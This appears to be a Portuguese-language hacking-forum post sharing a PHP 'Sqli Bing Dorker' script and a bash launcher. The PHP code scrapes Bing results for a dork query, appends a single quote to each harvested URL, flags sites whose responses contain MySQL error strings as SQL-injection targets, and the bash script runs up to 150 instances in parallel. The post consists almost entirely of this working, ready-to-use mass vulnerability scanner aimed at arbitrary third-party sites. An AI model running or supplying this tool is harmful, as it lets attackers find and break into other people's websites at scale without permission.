Script simples que tem como funçao a captura de sites via bing para verificação de sqli.
Feito isso o script gera o log com os resultados.
PHP Code:
Bash code:
Youtube:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
[]'s
Feito isso o script gera o log com os resultados.
PHP Code:
Código PHP:
<?php
/*
* php bing-dorker.php dork
* sh bing-dorker.sh dork_file
* sqli_vulns.txt to results.
*
* php -> http://pastebin.com/VWMbSw7r
* bash -> http://pastebin.com/ZE6V1m0E
* https://www.youtube.com/watch?v=Li2xNPDbzOU
*
* http://Janissaries.org
* 2013
* */
set_time_limit(0);
error_reporting(0);
class Colors {
private $foreground_colors = array();
private $background_colors = array();
public function __construct() {
$this->foreground_colors['light_blue'] = '1;34';
$this->foreground_colors['light_green'] = '1;32';
$this->foreground_colors['white'] = '1;37';
}
// Returns colored string
public function getColoredString($string, $foreground_color = null, $background_color = null) {
$colored_string = "";
// Check if given foreground color found
if (isset($this->foreground_colors[$foreground_color])) {
$colored_string .= "\033[" . $this->foreground_colors[$foreground_color] . "m";
}
// Check if given background color found
if (isset($this->background_colors[$background_color])) {
$colored_string .= "\033[" . $this->background_colors[$background_color] . "m";
}
// Add string and end coloring
$colored_string .= $string . "\033[0m";
return $colored_string;
}
// Returns all foreground color names
public function getForegroundColors() {
return array_keys($this->foreground_colors);
}
// Returns all background color names
public function getBackgroundColors() {
return array_keys($this->background_colors);
}
}
$c = new Colors;
function save_content($content, $file){
$fp = fopen($file, "a");
fwrite($fp, $content."\r\n");
fclose($fp);
}
function sec($site){
preg_match_all('{http://(.*?)(/index.php)}siU',$site, $sites);
if(preg_match("/www/",@$sites[0][0])){
return $site=str_replace("index.php","",$sites[0][0]);
}
else{
return $site=str_replace("http://","http://www.",str_replace("index.php","",@$sites[0][0]));
flush();
}
}
function sqli($host, $threads){
$sqli = "sqli_vulns.txt"; // sqli vulns.
$multi = curl_multi_init();
$bol = array_chunk($host, $threads);
$cntz = 1;
foreach($bol as $site){
for($i=0;$i<=count($site)-1;$i++){
$ch[$i] = curl_init();
curl_setopt($ch[$i], CURLOPT_URL, 'http://'.$site[$i].'\'');
curl_setopt($ch[$i], CURLOPT_FOLLOWLOCATION, TRUE);
curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch[$i], CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0");
curl_setopt($ch[$i], CURLOPT_TIMEOUT, 8);
curl_multi_add_handle($multi, $ch[$i]);
}do{
curl_multi_exec($multi, $handle);usleep(1);}while($handle>0);
foreach($ch as $ch_id => $cnt)
{
$grep[$ch_id] = curl_multi_getcontent($cnt);
curl_multi_remove_handle($multi,$cnt);
print "[$cntz] Fuzzing!!!\n";
if(preg_match('/Mysql_|SQL|mysql_num_rows()|mysql_fetch_assoc()|mysql_result()|mysql_fetch_array()|mysql_numrows()|mysql_preg_match()/',$grep[$ch_id]))
{
$fp = fopen($sqli, "a");
fwrite($fp, $site[$ch_id]."\n");
fclose($fp);
flush();
}
$cntz++;
}
}
}
function parse_content($file){
$content = array_filter(array_unique(explode("\n", file_get_contents($file))));
unlink($file);
foreach($content as $new_content)
{
$fp = fopen($file, "a");
fwrite($fp, $new_content."\r\n");
fclose($fp);
}
print "\n\n";
print "======================================\n";
print "[+] FinisheD! All content parsed in => $file\n";
print "Total urls: [".count(file($file))."]\n";
print "======================================\n";
print "Fuzzing sites to sqli\n";
flush();
}
function ger_log(){
$rand_1 = rand();
$rand_2 = $rand_1."_tmp";
$a = fopen($rand_2, "a");
fclose($a);
return $rand_2;
}
function bing($dork,$log){
$c = new Colors;
$array = array();
print "Dork: [".$dork."]\n";
$pageNum = 0;
while(true || $pageNum <= 50000)
{
$bing = "http://www.bing.com/search?q=".str_replace(" ","+",$dork)."&go=&filt=all&first=".$pageNum."";
if(!preg_match("/No results found for/",Connect_Host($bing)))
{
preg_match_all("/<h3><a href=\"(.*?)\">/",Connect_Host($bing),$sites);
if(count($sites[1])==0)
{return false;}
echo $c->getColoredString("[+]Greping results at page => $pageNum\n", "light_green", "");
for($i=0 ; $i < count($sites[1]);$i++)
{
$site = str_replace(array("http://","https://","www."),"",$sites[1][$i]);
$site = substr($site, 0, strrpos( $site, '"') );
$site = str_replace("\" h=", "", $site);
if(!in_array($site,$array))
{
if(!preg_match("/msn|htmlstaff|facebook|imasters|revistaphp|debian/", $sites[1][$i]))
{
//echo $site."\n";
array_push($array,$site);
flush();
save_content($site,$log);
}
}
}
$pageNum += 10;
}
else{echo "No results \n";flush();return false;}
}
//$array = array_unique($uSites);
//for($i=0;$i<count($array);$i++){echo $array[$i]."<br />";}
}
function Connect_Host($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$data = curl_exec($ch);
if($data) {return $data; flush();}
else {return 0;}
}
if($argv[1])
{
$dork = trim("$argv[1]");
$log = ger_log();
$threads = "10"; // Threads to check sqli
echo $c->getColoredString("+------------------------------------------------------+", "white", "")."\n";
echo $c->getColoredString("Sqli Bing Dorker by n4sss\n", "light_green", "");
echo $c->getColoredString("Dork: ".$dork."\n", "white", "");
echo $c->getColoredString("+------------------------------------------------------+", "white", "")."\n";
bing($dork, $log);
parse_content($log);
$loq = explode("\n", file_get_contents($log));
sqli($loq, $threads);
unlink($log);
}
?>
Código:
#!/bin/bash datainicial=`date +%s` printf "=========================\n" printf "Sqli Bing dorker by n4sss\n" printf "=========================\n" cat $1 | sort | uniq > mfu.txt CONTOR=0 for i in `cat mfu.txt` do CONTOR=`ps aux | grep -c php` while [ $CONTOR -ge 150 ];do CONTOR=`ps aux | grep -c php` echo "Sleeping" sleep 5 done if [ $CONTOR -le 150 ]; then php bing-dorker.php $i > /dev/null & fi done datafinal=`date +%s` soma=`expr $datafinal - $datainicial` resultado=`expr 10800 + $soma` tempo=`date -d @$resultado +%H:%M:%S` printf "Time to launch stances: $tempo\n" printf "All ps in bg now!\n" printf "Check with ps aux | grep php to more information\n" rm mfu.txt
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
[]'s